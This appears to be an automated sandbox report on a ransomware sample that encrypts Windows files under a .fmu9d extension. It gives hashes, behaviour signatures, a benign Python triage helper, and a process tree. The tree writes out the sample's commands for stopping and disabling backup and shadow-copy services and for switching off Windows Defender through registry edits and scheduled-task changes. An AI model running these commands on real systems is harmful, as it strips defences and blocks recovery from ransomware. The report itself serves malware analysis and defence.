Resubmissions
Submitted          Task ID             Score
13-01-2022 14:14   220113-rj8ymsagb4   10
13-01-2022 11:04   220113-m6crhahfgj   10
13-01-2022 10:58   220113-m3a4hahef9   10

Analysis
- max time kernel: 57s
- max time network: 153s
- platform: windows10_x64
- resource: win10-en-20211208
- submitted: 13-01-2022 10:58
Static task: static1
Behavioral task: behavioral1
  Sample: cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
  Resource: win7-en-20211208
Behavioral task: behavioral2
  Sample: cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
  Resource: win10-en-20211208
General
- Target: cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
- Size: 2.5MB
- MD5: 8fdfa1997b566f6e086c29e33935dcc5
- SHA1: 178fbe1c8fc1a6e3440215d668797699f94a4bef
- SHA256: cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68
- SHA512: b185d1080c62f59ff26592321bf2a5cb85556260f34f59726cc9d5aeed1f82a48c710e8decd1212ddc2e4ca371ba83ad3aca6bf34587ddc73cc9c90afec467d5
Malware Config
Signatures
Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
Uses the MpCmdRun utility to delete all AV definitions.
Processes:
  PID 4344  MpCmdRun.exe

Modifies security service (2 TTPs, 1 IoC)
Processes:
  reg.exe  Set value (int)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"

Clears Windows event logs (1 TTP)

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Drops file in Program Files directory (64 IoCs)
Processes: cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
File opened for modification (every entry below is by the sample process):
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_ja_4.4.0.v20140623020002.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_u6TustaWNW80.fmu9d
  C:\Program Files\Microsoft Office\root\Office16\WINWORD.VisualElementsManifest.xml.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_dRX2kSBd8-I0.fmu9d
  C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]_jKkhBXu26cc0.fmu9d
  C:\Program Files\Microsoft Office\root\Document Themes 16\Gallery.thmx.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_aubd7EaVH7g0.fmu9d
  C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-white_scale-140.png.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_PDMFPp_N5sg0.fmu9d
  C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial5-ul-oob.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_2Uy4j37glBE0.fmu9d
  C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\linesdistinctive.dotx.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_e-fdEeB6NZQ0.fmu9d
  C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusE5R_SubTrial-ul-oob.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_KLNKfZtaxgc0.fmu9d
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_ja_4.4.0.v20140623020002.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_O9UWejGBZsg0.fmu9d
  C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-lib-uihandler.xml.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_p_D2pXOLaPg0.fmu9d
  C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-startup.xml.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_CDZHotFKzhY0.fmu9d
  C:\Program Files\Common Files\microsoft shared\ink\de-DE\tabskb.dll.mui
  C:\Program Files\Common Files\microsoft shared\ink\fr-FR\InkObj.dll.mui
  C:\Program Files\Common Files\microsoft shared\ink\ipsita.xml
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\feature.xml.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_TT3l7SEPVbQ0.fmu9d
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf.ssl_1.1.0.v20140827-1444.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_Vq9hbZ6isos0.fmu9d
  C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp3-ul-oob.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_t_q-H0Fwyuk0.fmu9d
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\javax.servlet_3.0.0.v201112011016.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_f74xiJwk6J40.fmu9d
  C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial1-ul-oob.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_sC6txoINkxM0.fmu9d
  C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdR_OEM_Perp-ul-phn.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_sG2wwPjKhcs0.fmu9d
  C:\Program Files\Microsoft Office\root\Licenses16\Word2019R_Retail-ul-oob.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_vSOQw2a6NtU0.fmu9d
  C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-openide-options.xml.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_AlqxZ1hwEtk0.fmu9d
  C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-compat_zh_CN.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_e1wb2jxfFrM0.fmu9d
  C:\Program Files\Java\jre1.8.0_66\lib\security\blacklist.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_8_KuKZUQxuk0.fmu9d
  C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_Retail-ul-phn.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_opG2TB2KxRY0.fmu9d
  C:\Program Files\Common Files\System\Ole DB\ja-JP\msdasqlr.dll.mui.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_2QInFJrgL500.fmu9d
  C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019MSDNR_Retail-pl.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_LcCfXeWreww0.fmu9d
  C:\Program Files\Microsoft Office\root\Office16\MEDIA\LASER.WAV.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_KfR7gcjBHnI0.fmu9d
  C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL108.XML.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_LhjMpSvU4Mc0.fmu9d
  C:\Program Files\Microsoft Office\root\Office16\PersonaSpy\notice.txt.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_xPbG3pzwwC40.fmu9d
  C:\Program Files\Common Files\microsoft shared\ink\es-MX\tipresx.dll.mui
  C:\Program Files\Microsoft Office\root\Licenses16\PersonalR_OEM_Perp-ul-oob.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_zVSvPvogpvQ0.fmu9d
  C:\Program Files\Internet Explorer\de-DE\iexplore.exe.mui.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_R9OV6-n5LH00.fmu9d
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_zh_4.4.0.v20140623020002.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_fYaD4mX2Jt80.fmu9d
  C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-annotations-common_zh_CN.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_gzVcIpieRYk0.fmu9d
  C:\Program Files\Microsoft Office\root\Licenses16\OneNoteVL_MAK-ul-oob.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_ooyu-bPKq7o0.fmu9d
  C:\Program Files\Microsoft Office\root\Licenses16\VisioProMSDNR_Retail-pl.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_schHjeN7pfw0.fmu9d
  C:\Program Files\Microsoft Office\root\Office16\MSIPC\sv\msipc.dll.mui.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_9EwQFLOz8Bc0.fmu9d
  C:\Program Files\Microsoft Office\root\Office16\MEDIA\CAMERA.WAV.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_Ato2AUXaqpk0.fmu9d
  C:\Program Files\7-Zip\Lang\fr.txt.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_aRy6dd9lJmY0.fmu9d
  C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\ja-jp.xml
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_ja_4.4.0.v20140623020002.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_Eu6Tbbj7xFg0.fmu9d
  C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp3-ppd.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_jKvcEfP5Gj80.fmu9d
  C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Grace-ul-oob.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_XbwawN3m78I0.fmu9d
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mru_on_win7.css.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_Iw_NvNnGh-Y0.fmu9d
  C:\Program Files\Microsoft Office\root\Licenses16\OutlookR_Trial-ppd.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_GCCHLIqOR800.fmu9d
  C:\Program Files\Microsoft Office\root\Office16\1033\ClientSub_eula.txt.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_HHe4TjruLfs0.fmu9d
  C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\APASixthEditionOfficeOnline.xsl.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_eJXb6MKG-Ak0.fmu9d
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.ja_5.5.0.165303.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_u-Lb0TLVjJU0.fmu9d
  C:\Program Files\Microsoft Office\root\Office16\1033\WacLangPackEula.txt.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_3ZTgQ4pCBtk0.fmu9d
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\leftnav.gif.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_b7BKT4GfSTk0.fmu9d
  C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-dialogs_ja.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_5T5Os-4u0Y40.fmu9d
  C:\Program Files\Microsoft Office\root\Office16\PROOF\MSGR8EN.LEX.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_aiL5EAiVNHQ0.fmu9d
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark.css.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_Vy4WlpRw8mU0.fmu9d
  C:\Program Files\Microsoft Office\root\vfs\Fonts\private\ANTQUAI.TTF.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_tR_G96RAVcU0.fmu9d
  C:\Program Files\Java\jdk1.8.0_66\jre\lib\jce.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_h_P3hHh55lc0.fmu9d
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\dropins\README.TXT.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_2AYuo4OFmgw0.fmu9d
  C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.common.16.xml.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_i34hTHRddwk0.fmu9d
  C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL107.XML.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_DbbBGl8Mznk0.fmu9d
  C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\win32_MoveNoDrop32x32.gif.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_qq2dQt6v90Q0.fmu9d
  C:\Program Files\Java\jre1.8.0_66\lib\management\snmp.acl.template.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_TbhbsurI0280.fmu9d
  C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_OEM_Perp-pl.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_46jjTW_3O680.fmu9d
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro_5.5.0.165303.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_kZVkxwKDDwI0.fmu9d
  C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019R_Grace-ppd.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_1XKlntuGei40.fmu9d

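The renamed paths above share one naming pattern: the original name, a dot, a 43-character token that is identical for every file in this run, an underscore, a 12-character per-file token, and the .fmu9d extension; a few files (the .mui and ink XML files) were opened but not renamed. The Python below is an added example, not part of the sandbox report, that parses that pattern, separates renamed files from files merely opened, checks that only one shared token appears, and counts which original extensions were hit. The pattern is read off the listed paths only; what the two tokens encode is not stated in the report and is not assumed here. The five sample paths are copied from the list above and embedded as constructed input.

```python
import re
from collections import Counter
from pathlib import PureWindowsPath
from typing import NamedTuple, Optional

# Naming pattern read off the "File opened for modification" paths above:
#   <original name>.<43-char shared token>_<12-char per-file token>.fmu9d
# The shared token is the same for every renamed file in this run and the
# per-file token ends in "0" for every listed path. What either token
# encodes is not stated in the report and is not assumed here.
MARKER_RE = re.compile(
    r"^(?P<original>.+)\.(?P<shared>[A-Za-z0-9_-]{43})_(?P<per_file>[A-Za-z0-9_-]{12})\.fmu9d$"
)


class Renamed(NamedTuple):
    original: str   # path as it was before the marker was appended
    shared: str     # 43-char token common to every renamed file on this host
    per_file: str   # 12-char token unique to this file


def parse_marker(path: str) -> Optional[Renamed]:
    """Return the parsed marker for a renamed path, or None when the name
    does not carry the marker (the file was opened but not renamed)."""
    m = MARKER_RE.match(path)
    if m is None:
        return None
    return Renamed(m["original"], m["shared"], m["per_file"])


def triage_paths(paths):
    """Split touched paths into renamed files and files opened without a
    rename, and collect the shared tokens seen. One host should yield
    exactly one shared token; more than one means artefacts from two
    runs (or two hosts) are mixed together."""
    renamed, untouched = [], []
    for p in paths:
        r = parse_marker(p)
        if r is None:
            untouched.append(p)
        else:
            renamed.append(r)
    return renamed, untouched, {r.shared for r in renamed}


def targeted_extensions(renamed):
    """Count original extensions of renamed files (lower-cased; a file with
    no extension, such as the JRE 'blacklist' file, counts under '')."""
    return Counter(PureWindowsPath(r.original).suffix.lower() for r in renamed)


# Constructed sample input: five paths copied from the list above, three
# carrying the marker and two that were opened without being renamed.
SAMPLE_PATHS = [
    r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.VisualElementsManifest.xml.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_dRX2kSBd8-I0.fmu9d",
    r"C:\Program Files\7-Zip\Lang\fr.txt.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_aRy6dd9lJmY0.fmu9d",
    r"C:\Program Files\Java\jre1.8.0_66\lib\security\blacklist.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_8_KuKZUQxuk0.fmu9d",
    r"C:\Program Files\Common Files\microsoft shared\ink\de-DE\tabskb.dll.mui",
    r"C:\Program Files\Common Files\microsoft shared\ink\ipsita.xml",
]

if __name__ == "__main__":
    renamed, untouched, tokens = triage_paths(SAMPLE_PATHS)
    print(f"renamed: {len(renamed)}, untouched: {len(untouched)}, shared tokens: {tokens}")
    for r in renamed:
        print(f"  {r.per_file}  {r.original}")
    print("original extensions hit:", dict(targeted_extensions(renamed)))
```

Feeding the full 64-entry list through `triage_paths` is the quick way to confirm that a single token covers the whole run and to see which of the opened files were left unrenamed (here the .mui and ink XML files), which is worth noting when deciding what to restore from backup.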
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.

Interacts with shadow copies (2 TTPs, 1 IoC)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
  PID 2192  vssadmin.exe

Modifies registry class (3 IoCs)
Processes:
  reg.exe  Key deleted  \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP
  reg.exe  Key deleted  \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP
  reg.exe  Key deleted  \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP

Runs net.exe

Suspicious behavior: EnumeratesProcesses (8 IoCs)
Processes:
  PID 3280  powershell.exe  (3 entries)
  PID 2148  powershell.exe  (3 entries)
  PID 3384  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  (2 entries)

Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes:
  PID 4000  wevtutil.exe  SeSecurityPrivilege, SeBackupPrivilege
  PID 4040  wevtutil.exe  SeSecurityPrivilege, SeBackupPrivilege
  PID 4092  wevtutil.exe  SeSecurityPrivilege, SeBackupPrivilege
  PID 3128  wmic.exe  SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  PID 4316  wmic.exe  same list as PID 3128, recorded twice; the second pass ends at SeUndockPrivilege, which is the 64th entry shown

Suspicious use of WriteProcessMemory (64 IoCs)
Processes (writer PID -> target PID, with the number of writes recorded; "sample" is PID 3384, cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe):
  3384 sample -> 2640 net.exe (3)
  2640 net.exe -> 4240 net1.exe (3)
  3384 sample -> 4076 net.exe (3)
  4076 net.exe -> 2008 net1.exe (3)
  3384 sample -> 4256 net.exe (3)
  4256 net.exe -> 4288 net1.exe (3)
  3384 sample -> 4272 net.exe (3)
  4272 net.exe -> 4404 net1.exe (3)
  3384 sample -> 4384 net.exe (3)
  4384 net.exe -> 4464 net1.exe (3)
  3384 sample -> 4444 net.exe (3)
  4444 net.exe -> 4344 net1.exe (3)
  3384 sample -> 4324 net.exe (3)
  4324 net.exe -> 4420 net1.exe (3)
  3384 sample -> 3800 net.exe (3)
  3800 net.exe -> 4308 net1.exe (3)
  3384 sample -> 3076 net.exe (3)
  3076 net.exe -> 512 net1.exe (3)
  3384 sample -> 652 sc.exe (3)
  3384 sample -> 3260 sc.exe (3)
  3384 sample -> 1032 sc.exe (3)
  3384 sample -> 1244 sc.exe (1; the listing stops at the 64th entry)
Processes
Tree depth is shown as [1], [2], [3]; each entry gives the image path, PID, command line and any signatures attached to that process.

[1] C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  (PID 3384)
    cmd: "C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe"
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\SysWOW64\net.exe  (PID 2640)
      cmd: net.exe stop "SamSs" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\net1.exe  (PID 4240)
        cmd: C:\Windows\system32\net1 stop "SamSs" /y
  [2] C:\Windows\SysWOW64\net.exe  (PID 4076)
      cmd: net.exe stop "SDRSVC" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\net1.exe  (PID 2008)
        cmd: C:\Windows\system32\net1 stop "SDRSVC" /y
  [2] C:\Windows\SysWOW64\net.exe  (PID 4256)
      cmd: net.exe stop "SstpSvc" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\net1.exe  (PID 4288)
        cmd: C:\Windows\system32\net1 stop "SstpSvc" /y
  [2] C:\Windows\SysWOW64\net.exe  (PID 4272)
      cmd: net.exe stop "UI0Detect" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\net1.exe  (PID 4404)
        cmd: C:\Windows\system32\net1 stop "UI0Detect" /y
  [2] C:\Windows\SysWOW64\net.exe  (PID 4384)
      cmd: net.exe stop "vmicvss" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\net1.exe  (PID 4464)
        cmd: C:\Windows\system32\net1 stop "vmicvss" /y
  [2] C:\Windows\SysWOW64\net.exe  (PID 4444)
      cmd: net.exe stop "VSS" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\net1.exe  (PID 4344)
        cmd: C:\Windows\system32\net1 stop "VSS" /y
  [2] C:\Windows\SysWOW64\net.exe  (PID 4324)
      cmd: net.exe stop "wbengine" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\net1.exe  (PID 4420)
        cmd: C:\Windows\system32\net1 stop "wbengine" /y
  [2] C:\Windows\SysWOW64\net.exe  (PID 3800)
      cmd: net.exe stop "WebClient" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\net1.exe  (PID 4308)
        cmd: C:\Windows\system32\net1 stop "WebClient" /y
  [2] C:\Windows\SysWOW64\net.exe  (PID 3076)
      cmd: net.exe stop "UnistoreSvc_12cea" /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\net1.exe  (PID 512)
        cmd: C:\Windows\system32\net1 stop "UnistoreSvc_12cea" /y
  [2] C:\Windows\SysWOW64\sc.exe  (PID 652)
      cmd: sc.exe config "SamSs" start= disabled
  [2] C:\Windows\SysWOW64\sc.exe  (PID 3260)
      cmd: sc.exe config "SDRSVC" start= disabled
  [2] C:\Windows\SysWOW64\sc.exe  (PID 1032)
      cmd: sc.exe config "SstpSvc" start= disabled
  [2] C:\Windows\SysWOW64\sc.exe  (PID 1244)
      cmd: sc.exe config "UI0Detect" start= disabled
  [2] C:\Windows\SysWOW64\sc.exe  (PID 1508)
      cmd: sc.exe config "vmicvss" start= disabled
  [2] C:\Windows\SysWOW64\sc.exe  (PID 1784)
      cmd: sc.exe config "VSS" start= disabled
  [2] C:\Windows\SysWOW64\sc.exe  (PID 1284)
      cmd: sc.exe config "wbengine" start= disabled
  [2] C:\Windows\SysWOW64\sc.exe  (PID 2348)
      cmd: sc.exe config "WebClient" start= disabled
  [2] C:\Windows\SysWOW64\sc.exe  (PID 2584)
      cmd: sc.exe config "UnistoreSvc_12cea" start= disabled
  [2] C:\Windows\SysWOW64\reg.exe  (PID 2768)
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  [2] C:\Windows\SysWOW64\reg.exe  (PID 3156)
      cmd: reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  [2] C:\Windows\SysWOW64\reg.exe  (PID 3244)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  [2] C:\Windows\SysWOW64\reg.exe  (PID 4836)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  [2] C:\Windows\SysWOW64\reg.exe  (PID 1148)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  [2] C:\Windows\SysWOW64\reg.exe  (PID 4976)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  [2] C:\Windows\SysWOW64\reg.exe  (PID 2000)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  [2] C:\Windows\SysWOW64\reg.exe  (PID 4960)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  [2] C:\Windows\SysWOW64\reg.exe  (PID 4864)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  [2] C:\Windows\SysWOW64\reg.exe  (PID 4580)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  [2] C:\Windows\SysWOW64\reg.exe  (PID 3196)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  [2] C:\Windows\SysWOW64\reg.exe  (PID 4912)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  [2] C:\Windows\SysWOW64\reg.exe  (PID 2688)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  [2] C:\Windows\SysWOW64\reg.exe  (PID 1060)
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  [2] C:\Windows\SysWOW64\reg.exe  (PID 884)
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  [2] C:\Windows\SysWOW64\reg.exe  (PID 1044)
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  [2] C:\Windows\SysWOW64\schtasks.exe  (PID 2496)
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  [2] C:\Windows\SysWOW64\schtasks.exe  (PID 4788)
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  [2] C:\Windows\SysWOW64\schtasks.exe  (PID 924)
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  [2] C:\Windows\SysWOW64\schtasks.exe  (PID 2544)
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
